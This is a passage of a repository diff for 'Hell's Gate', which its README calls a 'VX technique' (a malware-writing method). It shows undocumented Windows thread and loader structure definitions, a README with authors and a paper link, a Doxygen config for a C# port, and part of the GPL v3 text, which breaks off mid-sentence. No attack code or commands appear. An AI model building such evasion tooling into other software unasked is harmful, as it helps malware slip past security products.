|
||||
NTSTATUS LastStatusValue;
|
||||
UNICODE_STRING StaticUnicodeString;
|
||||
WCHAR StaticUnicodeBuffer[261];
|
||||
PVOID DeallocationStack;
|
||||
PVOID TlsSlots[64];
|
||||
LIST_ENTRY TlsLinks;
|
||||
PVOID Vdm;
|
||||
PVOID ReservedForNtRpc;
|
||||
PVOID DbgSsReserved[2];
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG HardErrorMode;
|
||||
#else
|
||||
ULONG HardErrorsAreDisabled;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||
GUID ActivityId;
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
PVOID EtwTraceData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID Instrumentation[14];
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
#else
|
||||
PVOID Instrumentation[16];
|
||||
#endif
|
||||
PVOID WinSockData;
|
||||
ULONG GdiBatchCount;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
BOOLEAN SpareBool0;
|
||||
BOOLEAN SpareBool1;
|
||||
BOOLEAN SpareBool2;
|
||||
#else
|
||||
BOOLEAN InDbgPrint;
|
||||
BOOLEAN FreeStackOnTermination;
|
||||
BOOLEAN HasFiberData;
|
||||
#endif
|
||||
UCHAR IdealProcessor;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG GuaranteedStackBytes;
|
||||
#else
|
||||
ULONG Spare3;
|
||||
#endif
|
||||
PVOID ReservedForPerf;
|
||||
PVOID ReservedForOle;
|
||||
ULONG WaitingOnLoaderLock;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID SavedPriorityState;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR ThreadPoolData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG_PTR SparePointer1;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR SoftPatchPtr2;
|
||||
#else
|
||||
Wx86ThreadState Wx86Thread;
|
||||
#endif
|
||||
PVOID* TlsExpansionSlots;
|
||||
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||
PVOID DeallocationBStore;
|
||||
PVOID BStoreLimit;
|
||||
#endif
|
||||
ULONG ImpersonationLocale;
|
||||
ULONG IsImpersonating;
|
||||
PVOID NlsCache;
|
||||
PVOID pShimData;
|
||||
ULONG HeapVirtualAffinity;
|
||||
HANDLE CurrentTransactionHandle;
|
||||
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID FlsData;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID PreferredLangauges;
|
||||
PVOID UserPrefLanguages;
|
||||
PVOID MergedPrefLanguages;
|
||||
ULONG MuiImpersonation;
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT SpareCrossTebFlags : 16;
|
||||
};
|
||||
USHORT CrossTebFlags;
|
||||
};
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT DbgSafeThunkCall : 1;
|
||||
USHORT DbgInDebugPrint : 1;
|
||||
USHORT DbgHasFiberData : 1;
|
||||
USHORT DbgSkipThreadAttach : 1;
|
||||
USHORT DbgWerInShipAssertCode : 1;
|
||||
USHORT DbgIssuedInitialBp : 1;
|
||||
USHORT DbgClonedThread : 1;
|
||||
USHORT SpareSameTebBits : 9;
|
||||
};
|
||||
USHORT SameTebFlags;
|
||||
};
|
||||
PVOID TxnScopeEntercallback;
|
||||
PVOID TxnScopeExitCAllback;
|
||||
PVOID TxnScopeContext;
|
||||
ULONG LockCount;
|
||||
ULONG ProcessRundown;
|
||||
ULONG64 LastSwitchTime;
|
||||
ULONG64 TotalSwitchOutTime;
|
||||
LARGE_INTEGER WaitReasonBitMap;
|
||||
#else
|
||||
BOOLEAN SafeThunkCall;
|
||||
BOOLEAN BooleanSpare[3];
|
||||
#endif
|
||||
} TEB, * PTEB;
|
||||
|
||||
typedef struct _LDR_DATA_TABLE_ENTRY {
|
||||
LIST_ENTRY InLoadOrderLinks;
|
||||
LIST_ENTRY InMemoryOrderLinks;
|
||||
LIST_ENTRY InInitializationOrderLinks;
|
||||
PVOID DllBase;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
WORD LoadCount;
|
||||
WORD TlsIndex;
|
||||
union {
|
||||
LIST_ENTRY HashLinks;
|
||||
struct {
|
||||
PVOID SectionPointer;
|
||||
ULONG CheckSum;
|
||||
};
|
||||
};
|
||||
union {
|
||||
ULONG TimeDateStamp;
|
||||
PVOID LoadedImports;
|
||||
};
|
||||
PACTIVATION_CONTEXT EntryPointActivationContext;
|
||||
PVOID PatchInformation;
|
||||
LIST_ENTRY ForwarderLinks;
|
||||
LIST_ENTRY ServiceTagLinks;
|
||||
LIST_ENTRY StaticLinks;
|
||||
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
|
||||
|
||||
typedef struct _OBJECT_ATTRIBUTES {
|
||||
ULONG Length;
|
||||
PVOID RootDirectory;
|
||||
PUNICODE_STRING ObjectName;
|
||||
ULONG Attributes;
|
||||
PVOID SecurityDescriptor;
|
||||
PVOID SecurityQualityOfService;
|
||||
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
|
||||
|
||||
typedef struct _INITIAL_TEB {
|
||||
PVOID StackBase;
|
||||
PVOID StackLimit;
|
||||
PVOID StackCommit;
|
||||
PVOID StackCommitMax;
|
||||
PVOID StackReserved;
|
||||
} INITIAL_TEB, * PINITIAL_TEB;
|
|
@ -0,0 +1,21 @@
|
|||
## Hell's Gate ##
|
||||
|
||||
Original C Implementation of the Hell's Gate VX Technique
|
||||
<br />
|
||||
<br />
|
||||
Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
|
||||
<br /> PDF also included in this repository.
|
||||
<br />
|
||||
<br />
|
||||
Authors:
|
||||
* Paul Laîné (@am0nsec)
|
||||
* smelly__vx (@RtlMateusz)
|
||||
<br />
|
||||
|
||||
### Update ###
|
||||
Please note:
|
||||
* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
|
||||
* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
|
||||
* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
|
||||
* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
|
||||
|
|
@ -0,0 +1,385 @@
|
|||
# Doxyfile 1.8.18
|
||||
|
||||
#---------------------------------------------------------------------------
|
||||
# Project related configuration options
|
||||
#---------------------------------------------------------------------------
|
||||
DOXYFILE_ENCODING = UTF-8
|
||||
PROJECT_NAME = "Shap Hell's Gate"
|
||||
PROJECT_NUMBER = 1.0
|
||||
PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
|
||||
PROJECT_LOGO =
|
||||
OUTPUT_DIRECTORY = ./doc/
|
||||
CREATE_SUBDIRS = YES
|
||||
ALLOW_UNICODE_NAMES = NO
|
||||
OUTPUT_LANGUAGE = English
|
||||
OUTPUT_TEXT_DIRECTION = None
|
||||
BRIEF_MEMBER_DESC = YES
|
||||
REPEAT_BRIEF = YES
|
||||
ABBREVIATE_BRIEF = "The $name class" \
|
||||
"The $name widget" \
|
||||
"The $name file" \
|
||||
is \
|
||||
provides \
|
||||
specifies \
|
||||
contains \
|
||||
represents \
|
||||
a \
|
||||
an \
|
||||
the
|
||||
ALWAYS_DETAILED_SEC = NO
|
||||
INLINE_INHERITED_MEMB = NO
|
||||
FULL_PATH_NAMES = YES
|
||||
STRIP_FROM_PATH =
|
||||
STRIP_FROM_INC_PATH =
|
||||
SHORT_NAMES = NO
|
||||
JAVADOC_AUTOBRIEF = NO
|
||||
JAVADOC_BANNER = NO
|
||||
QT_AUTOBRIEF = NO
|
||||
MULTILINE_CPP_IS_BRIEF = NO
|
||||
INHERIT_DOCS = YES
|
||||
SEPARATE_MEMBER_PAGES = NO
|
||||
TAB_SIZE = 4
|
||||
ALIASES =
|
||||
OPTIMIZE_OUTPUT_FOR_C = NO
|
||||
OPTIMIZE_OUTPUT_JAVA = NO
|
||||
OPTIMIZE_FOR_FORTRAN = NO
|
||||
OPTIMIZE_OUTPUT_VHDL = NO
|
||||
OPTIMIZE_OUTPUT_SLICE = NO
|
||||
EXTENSION_MAPPING =
|
||||
MARKDOWN_SUPPORT = YES
|
||||
TOC_INCLUDE_HEADINGS = 5
|
||||
AUTOLINK_SUPPORT = YES
|
||||
BUILTIN_STL_SUPPORT = NO
|
||||
CPP_CLI_SUPPORT = NO
|
||||
SIP_SUPPORT = NO
|
||||
IDL_PROPERTY_SUPPORT = YES
|
||||
DISTRIBUTE_GROUP_DOC = NO
|
||||
GROUP_NESTED_COMPOUNDS = NO
|
||||
SUBGROUPING = YES
|
||||
INLINE_GROUPED_CLASSES = NO
|
||||
INLINE_SIMPLE_STRUCTS = NO
|
||||
TYPEDEF_HIDES_STRUCT = NO
|
||||
LOOKUP_CACHE_SIZE = 0
|
||||
#---------------------------------------------------------------------------
|
||||
# Build related configuration options
|
||||
#---------------------------------------------------------------------------
|
||||
EXTRACT_ALL = YES
|
||||
EXTRACT_PRIVATE = YES
|
||||
EXTRACT_PRIV_VIRTUAL = YES
|
||||
EXTRACT_PACKAGE = YES
|
||||
EXTRACT_STATIC = YES
|
||||
EXTRACT_LOCAL_CLASSES = YES
|
||||
EXTRACT_LOCAL_METHODS = NO
|
||||
EXTRACT_ANON_NSPACES = YES
|
||||
HIDE_UNDOC_MEMBERS = NO
|
||||
HIDE_UNDOC_CLASSES = NO
|
||||
HIDE_FRIEND_COMPOUNDS = NO
|
||||
HIDE_IN_BODY_DOCS = NO
|
||||
INTERNAL_DOCS = NO
|
||||
CASE_SENSE_NAMES = YES
|
||||
HIDE_SCOPE_NAMES = NO
|
||||
HIDE_COMPOUND_REFERENCE= NO
|
||||
SHOW_INCLUDE_FILES = YES
|
||||
SHOW_GROUPED_MEMB_INC = NO
|
||||
FORCE_LOCAL_INCLUDES = NO
|
||||
INLINE_INFO = YES
|
||||
SORT_MEMBER_DOCS = YES
|
||||
SORT_BRIEF_DOCS = NO
|
||||
SORT_MEMBERS_CTORS_1ST = NO
|
||||
SORT_GROUP_NAMES = NO
|
||||
SORT_BY_SCOPE_NAME = NO
|
||||
STRICT_PROTO_MATCHING = NO
|
||||
GENERATE_TODOLIST = YES
|
||||
GENERATE_TESTLIST = YES
|
||||
GENERATE_BUGLIST = YES
|
||||
GENERATE_DEPRECATEDLIST= YES
|
||||
ENABLED_SECTIONS =
|
||||
MAX_INITIALIZER_LINES = 30
|
||||
SHOW_USED_FILES = YES
|
||||
SHOW_FILES = YES
|
||||
SHOW_NAMESPACES = YES
|
||||
FILE_VERSION_FILTER =
|
||||
LAYOUT_FILE =
|
||||
CITE_BIB_FILES =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to warning and progress messages
|
||||
#---------------------------------------------------------------------------
|
||||
QUIET = NO
|
||||
WARNINGS = YES
|
||||
WARN_IF_UNDOCUMENTED = YES
|
||||
WARN_IF_DOC_ERROR = YES
|
||||
WARN_NO_PARAMDOC = NO
|
||||
WARN_AS_ERROR = NO
|
||||
WARN_FORMAT = "$file:$line: $text"
|
||||
WARN_LOGFILE =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the input files
|
||||
#---------------------------------------------------------------------------
|
||||
INPUT = .
|
||||
INPUT_ENCODING = UTF-8
|
||||
FILE_PATTERNS = *.c \
|
||||
*.cc \
|
||||
*.cxx \
|
||||
*.cpp \
|
||||
*.c++ \
|
||||
*.java \
|
||||
*.ii \
|
||||
*.ixx \
|
||||
*.ipp \
|
||||
*.i++ \
|
||||
*.inl \
|
||||
*.idl \
|
||||
*.ddl \
|
||||
*.odl \
|
||||
*.h \
|
||||
*.hh \
|
||||
*.hxx \
|
||||
*.hpp \
|
||||
*.h++ \
|
||||
*.cs \
|
||||
*.d \
|
||||
*.php \
|
||||
*.php4 \
|
||||
*.php5 \
|
||||
*.phtml \
|
||||
*.inc \
|
||||
*.m \
|
||||
*.markdown \
|
||||
*.md \
|
||||
*.mm \
|
||||
*.dox \
|
||||
*.doc \
|
||||
*.txt \
|
||||
*.py \
|
||||
*.pyw \
|
||||
*.f90 \
|
||||
*.f95 \
|
||||
*.f03 \
|
||||
*.f08 \
|
||||
*.f18 \
|
||||
*.f \
|
||||
*.for \
|
||||
*.vhd \
|
||||
*.vhdl \
|
||||
*.ucf \
|
||||
*.qsf \
|
||||
*.ice
|
||||
RECURSIVE = YES
|
||||
EXCLUDE =
|
||||
EXCLUDE_SYMLINKS = NO
|
||||
EXCLUDE_PATTERNS =
|
||||
EXCLUDE_SYMBOLS =
|
||||
EXAMPLE_PATH =
|
||||
EXAMPLE_PATTERNS = *
|
||||
EXAMPLE_RECURSIVE = NO
|
||||
IMAGE_PATH =
|
||||
INPUT_FILTER =
|
||||
FILTER_PATTERNS =
|
||||
FILTER_SOURCE_FILES = NO
|
||||
FILTER_SOURCE_PATTERNS =
|
||||
USE_MDFILE_AS_MAINPAGE =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to source browsing
|
||||
#---------------------------------------------------------------------------
|
||||
SOURCE_BROWSER = YES
|
||||
INLINE_SOURCES = YES
|
||||
STRIP_CODE_COMMENTS = YES
|
||||
REFERENCED_BY_RELATION = YES
|
||||
REFERENCES_RELATION = NO
|
||||
REFERENCES_LINK_SOURCE = YES
|
||||
SOURCE_TOOLTIPS = YES
|
||||
USE_HTAGS = NO
|
||||
VERBATIM_HEADERS = YES
|
||||
CLANG_ASSISTED_PARSING = NO
|
||||
CLANG_OPTIONS =
|
||||
CLANG_DATABASE_PATH =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the alphabetical class index
|
||||
#---------------------------------------------------------------------------
|
||||
ALPHABETICAL_INDEX = YES
|
||||
COLS_IN_ALPHA_INDEX = 5
|
||||
IGNORE_PREFIX =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the HTML output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_HTML = YES
|
||||
HTML_OUTPUT = html
|
||||
HTML_FILE_EXTENSION = .html
|
||||
HTML_HEADER =
|
||||
HTML_FOOTER =
|
||||
HTML_STYLESHEET =
|
||||
HTML_EXTRA_STYLESHEET =
|
||||
HTML_EXTRA_FILES =
|
||||
HTML_COLORSTYLE_HUE = 220
|
||||
HTML_COLORSTYLE_SAT = 100
|
||||
HTML_COLORSTYLE_GAMMA = 80
|
||||
HTML_TIMESTAMP = YES
|
||||
HTML_DYNAMIC_MENUS = YES
|
||||
HTML_DYNAMIC_SECTIONS = NO
|
||||
HTML_INDEX_NUM_ENTRIES = 100
|
||||
GENERATE_DOCSET = NO
|
||||
DOCSET_FEEDNAME = "Doxygen generated docs"
|
||||
DOCSET_BUNDLE_ID = org.doxygen.Project
|
||||
DOCSET_PUBLISHER_ID = org.doxygen.Publisher
|
||||
DOCSET_PUBLISHER_NAME = Publisher
|
||||
GENERATE_HTMLHELP = NO
|
||||
CHM_FILE =
|
||||
HHC_LOCATION =
|
||||
GENERATE_CHI = NO
|
||||
CHM_INDEX_ENCODING =
|
||||
BINARY_TOC = NO
|
||||
TOC_EXPAND = NO
|
||||
GENERATE_QHP = NO
|
||||
QCH_FILE =
|
||||
QHP_NAMESPACE = org.doxygen.Project
|
||||
QHP_VIRTUAL_FOLDER = doc
|
||||
QHP_CUST_FILTER_NAME =
|
||||
QHP_CUST_FILTER_ATTRS =
|
||||
QHP_SECT_FILTER_ATTRS =
|
||||
QHG_LOCATION =
|
||||
GENERATE_ECLIPSEHELP = NO
|
||||
ECLIPSE_DOC_ID = org.doxygen.Project
|
||||
DISABLE_INDEX = NO
|
||||
GENERATE_TREEVIEW = YES
|
||||
ENUM_VALUES_PER_LINE = 4
|
||||
TREEVIEW_WIDTH = 250
|
||||
EXT_LINKS_IN_WINDOW = NO
|
||||
HTML_FORMULA_FORMAT = png
|
||||
FORMULA_FONTSIZE = 10
|
||||
FORMULA_TRANSPARENT = YES
|
||||
FORMULA_MACROFILE =
|
||||
USE_MATHJAX = NO
|
||||
MATHJAX_FORMAT = HTML-CSS
|
||||
MATHJAX_RELPATH = https://cdn.jsdelivr.net/npm/mathjax@2
|
||||
MATHJAX_EXTENSIONS =
|
||||
MATHJAX_CODEFILE =
|
||||
SEARCHENGINE = YES
|
||||
SERVER_BASED_SEARCH = NO
|
||||
EXTERNAL_SEARCH = NO
|
||||
SEARCHENGINE_URL =
|
||||
SEARCHDATA_FILE = searchdata.xml
|
||||
EXTERNAL_SEARCH_ID =
|
||||
EXTRA_SEARCH_MAPPINGS =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the LaTeX output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_LATEX = NO
|
||||
LATEX_OUTPUT = latex
|
||||
LATEX_CMD_NAME =
|
||||
MAKEINDEX_CMD_NAME = makeindex
|
||||
LATEX_MAKEINDEX_CMD = makeindex
|
||||
COMPACT_LATEX = NO
|
||||
PAPER_TYPE = a4
|
||||
EXTRA_PACKAGES =
|
||||
LATEX_HEADER =
|
||||
LATEX_FOOTER =
|
||||
LATEX_EXTRA_STYLESHEET =
|
||||
LATEX_EXTRA_FILES =
|
||||
PDF_HYPERLINKS = YES
|
||||
USE_PDFLATEX = YES
|
||||
LATEX_BATCHMODE = NO
|
||||
LATEX_HIDE_INDICES = NO
|
||||
LATEX_SOURCE_CODE = NO
|
||||
LATEX_BIB_STYLE = plain
|
||||
LATEX_TIMESTAMP = NO
|
||||
LATEX_EMOJI_DIRECTORY =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the RTF output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_RTF = NO
|
||||
RTF_OUTPUT = rtf
|
||||
COMPACT_RTF = NO
|
||||
RTF_HYPERLINKS = NO
|
||||
RTF_STYLESHEET_FILE =
|
||||
RTF_EXTENSIONS_FILE =
|
||||
RTF_SOURCE_CODE = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the man page output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_MAN = NO
|
||||
MAN_OUTPUT = man
|
||||
MAN_EXTENSION = .3
|
||||
MAN_SUBDIR =
|
||||
MAN_LINKS = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the XML output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_XML = NO
|
||||
XML_OUTPUT = xml
|
||||
XML_PROGRAMLISTING = YES
|
||||
XML_NS_MEMB_FILE_SCOPE = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the DOCBOOK output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_DOCBOOK = NO
|
||||
DOCBOOK_OUTPUT = docbook
|
||||
DOCBOOK_PROGRAMLISTING = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options for the AutoGen Definitions output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_AUTOGEN_DEF = NO
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the Perl module output
|
||||
#---------------------------------------------------------------------------
|
||||
GENERATE_PERLMOD = NO
|
||||
PERLMOD_LATEX = NO
|
||||
PERLMOD_PRETTY = YES
|
||||
PERLMOD_MAKEVAR_PREFIX =
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the preprocessor
|
||||
#---------------------------------------------------------------------------
|
||||
ENABLE_PREPROCESSING = YES
|
||||
MACRO_EXPANSION = NO
|
||||
EXPAND_ONLY_PREDEF = NO
|
||||
SEARCH_INCLUDES = YES
|
||||
INCLUDE_PATH =
|
||||
INCLUDE_FILE_PATTERNS =
|
||||
PREDEFINED =
|
||||
EXPAND_AS_DEFINED =
|
||||
SKIP_FUNCTION_MACROS = YES
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to external references
|
||||
#---------------------------------------------------------------------------
|
||||
TAGFILES =
|
||||
GENERATE_TAGFILE =
|
||||
ALLEXTERNALS = NO
|
||||
EXTERNAL_GROUPS = YES
|
||||
EXTERNAL_PAGES = YES
|
||||
#---------------------------------------------------------------------------
|
||||
# Configuration options related to the dot tool
|
||||
#---------------------------------------------------------------------------
|
||||
CLASS_DIAGRAMS = YES
|
||||
DIA_PATH =
|
||||
HIDE_UNDOC_RELATIONS = YES
|
||||
HAVE_DOT = NO
|
||||
DOT_NUM_THREADS = 1
|
||||
DOT_FONTNAME = Helvetica
|
||||
DOT_FONTSIZE = 10
|
||||
DOT_FONTPATH =
|
||||
CLASS_GRAPH = YES
|
||||
COLLABORATION_GRAPH = YES
|
||||
GROUP_GRAPHS = YES
|
||||
UML_LOOK = NO
|
||||
UML_LIMIT_NUM_FIELDS = 10
|
||||
TEMPLATE_RELATIONS = NO
|
||||
INCLUDE_GRAPH = YES
|
||||
INCLUDED_BY_GRAPH = YES
|
||||
CALL_GRAPH = NO
|
||||
CALLER_GRAPH = NO
|
||||
GRAPHICAL_HIERARCHY = YES
|
||||
DIRECTORY_GRAPH = YES
|
||||
DOT_IMAGE_FORMAT = png
|
||||
INTERACTIVE_SVG = NO
|
||||
DOT_PATH =
|
||||
DOTFILE_DIRS =
|
||||
MSCFILE_DIRS =
|
||||
DIAFILE_DIRS =
|
||||
PLANTUML_JAR_PATH =
|
||||
PLANTUML_CFG_FILE =
|
||||
PLANTUML_INCLUDE_PATH =
|
||||
DOT_GRAPH_MAX_NODES = 50
|
||||
MAX_DOT_GRAPH_DEPTH = 0
|
||||
DOT_TRANSPARENT = NO
|
||||
DOT_MULTI_TARGETS = YES
|
||||
GENERATE_LEGEND = YES
|
||||
DOT_CLEANUP = YES
|
|
@ -0,0 +1,674 @@
|
|||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
